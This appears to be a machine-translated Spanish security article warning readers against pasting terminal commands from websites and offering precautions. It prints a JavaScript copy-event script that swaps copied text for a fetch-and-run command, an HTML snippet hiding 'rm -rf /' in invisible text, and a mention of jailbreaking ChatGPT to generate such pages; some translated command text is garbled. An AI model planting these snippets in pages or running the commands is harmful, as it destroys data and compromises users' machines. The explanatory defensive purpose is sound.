¿Por qué debería evitar copiar y pegar comandos de Internet? Causas, repercusiones y cómo afrontarlas de forma segura

En un mundo en rápida evolución, copiar y pegar comandos de Internet puede parecer una solución rápida y eficaz a nuestros problemas técnicos. Sin embargo, esta práctica puede ser riesgosa, ya que puede exponer su seguridad y privacidad a amenazas ocultas. Esta práctica apresurada puede tener efectos negativos en nuestros dispositivos y datos personales.

Desde computadoras hasta teléfonos móviles, copiar y pegar está en todas partes. Hace la vida más fácil y le ahorra tiempo, ya que no tiene que escribir comandos largos ni scripts redundantes. Sin embargo, si no tienes suficiente cuidado, puedes ser pirateado simplemente copiando algún código que se encuentra en la web y pegándolo en tu computadora.

A través de este artículo, revisaremos en detalle las posibles razones por las que debería considerar seriamente no copiar y pegar comandos de Internet, y resaltaremos las implicaciones de seguridad y privacidad de esta práctica. También cubriremos estrategias y consejos para manejar estas situaciones de manera segura y responsable, permitiéndonos aprovechar los beneficios de Internet sin riesgos. Aprendamos cómo copiar y pegar puede hacer que te pirateen y qué debes hacer para evitar que esto suceda. Verificar Métodos comunes utilizados por los piratas informáticos para piratear su cuenta bancaria.

¿Por qué debería evitar copiar y pegar comandos de Internet? Causas, repercusiones y cómo afrontarlas de forma segura - Protección

Por qué no deberías copiar y pegar comandos

Ya sea que sea nuevo en la línea de comandos o sea un experto, puede verse tentado a copiar y pegar comandos de Internet para ahorrar tiempo, realizar el trabajo real más rápido y ser más productivo. Sin embargo, debe tener en cuenta que los sitios web maliciosos en realidad utilizan cuadros de código como arma para inyectar código malicioso cuando copia y pega comandos directamente en la Terminal o el Símbolo del sistema.

Estos actores maliciosos utilizan varios trucos de interfaz para ocultar comandos maliciosos detrás de un código aparentemente inofensivo.

ordenar como sudo apt-get actualización && apt-get actualización Por lo general, debería actualizar los repositorios y los paquetes de actualización en Linux. Sin embargo, si no lo sabe y copia y pega este comando directamente en la Terminal, es posible que, sin saberlo, esté ejecutando código malicioso con privilegios de root debido al prefijo sudo.

En el peor de los casos, ejecutar el comando puede provocar una toma total de control de su sistema o incluso un ataque de ransomware. Pero, ¿cómo hacen esto los actores de amenazas? ¿Cómo se pueden ocultar comandos maliciosos detrás de código inofensivo?

Cómo funcionan los exploits de código malicioso

¿Por qué debería evitar copiar y pegar comandos de Internet? Causas, repercusiones y cómo afrontarlas de forma segura - Protección

Este exploit se puede realizar utilizando código Java Script ingeniosamente diseñado o incluso código HTML básico. Java Script tiene un mecanismo llamado EventListener. Estas son acciones que pueden ocurrir en el navegador, como hacer clic en un botón, enviar un formulario, mover el mouse, presionar teclas o cambiar el tamaño de una ventana.

EventListener, como sugiere el nombre, permite que su aplicación web reaccione a eventos específicos desencadenados por la acción del usuario. Las páginas web maliciosas aprovechan este mecanismo legítimo y útil capturando el evento en el que un usuario copia texto y reemplazando el texto inofensivo con código malicioso.

Aquí está el código de explotación principal utilizado para crear la imagen de prueba:

<script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Aquí hay otra demostración, que no requiere ningún Java Script y usa HTML básico:

<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

Este código crea texto blanco invisible, ocultando efectivamente el comando malicioso “rm -rf /”. Crea un salto de línea para que algunas ventanas de Terminal ejecuten el código inmediatamente cuando se pegue. Puede pensar que se necesita un gran conocimiento de programación y habilidades de desarrollo web para llevar a cabo este ataque, pero en realidad es muy fácil.

Incluso si un atacante no tiene conocimientos de Java Script o desarrollo web, puede fácilmente Creando malware usando ChatGPT. Usando las indicaciones correctas, uno puede fácilmente Jailbreak de ChatGPT Y haz que cree páginas web maliciosas que aprovechen este truco.

Cómo puedes protegerte

¿Por qué debería evitar copiar y pegar comandos de Internet? Causas, repercusiones y cómo afrontarlas de forma segura - Protección

No existe una forma concreta de protegerse de los ataques de códigos maliciosos. Claro, puedes rechazar el Java Script de sitios web sospechosos, pero por su propia naturaleza, probablemente no te permitirán navegar sin Java Script activado.

Además, para el método CSS (Hojas de estilo en cascada), no existe una defensa concreta contra comandos maliciosos ya que sigue siendo un código CSS válido (es decir, no hay ningún error al escribir el código pero la intención sigue siendo maliciosa). La mejor manera de protegerse es seguir reglas básicas de higiene online y reconocer las amenazas con sentido común.

No visite enlaces desconocidos y asegúrese siempre de pegar el comando que copió de Internet en un editor de texto antes de pegarlo en la Terminal. Cíñete a recursos de código legítimos y de buena reputación para asegurarte de que ningún código malicioso sea bienvenido en tu línea de comando.

Además, algunas aplicaciones de Terminal, como xfce4, vienen preinstaladas con protección de copiar y pegar. Mostrará una ventana emergente que le indicará exactamente qué se hará una vez que pegue un comando en la ventana del símbolo del sistema. Comprueba si el Terminal que estás utilizando también tiene un mecanismo similar y actívalo. Verificar Consejos esenciales para usuarios avanzados de Ubuntu Linux.

La ejecución de código malicioso es extremadamente peligrosa

Incluso si tiene un antivirus instalado, ciertas formas de ejecución de código malicioso aún pueden traspasar las barreras protectoras de su dispositivo. Por eso es importante tener cuidado con el código que copia en línea y utilizar medidas de protección siempre que sea posible para mantenerse seguro. Puedes ver ahora Impresionantes recursos para programar sin código para crear aplicaciones y crear sitios web sin código.

Ir al botón superior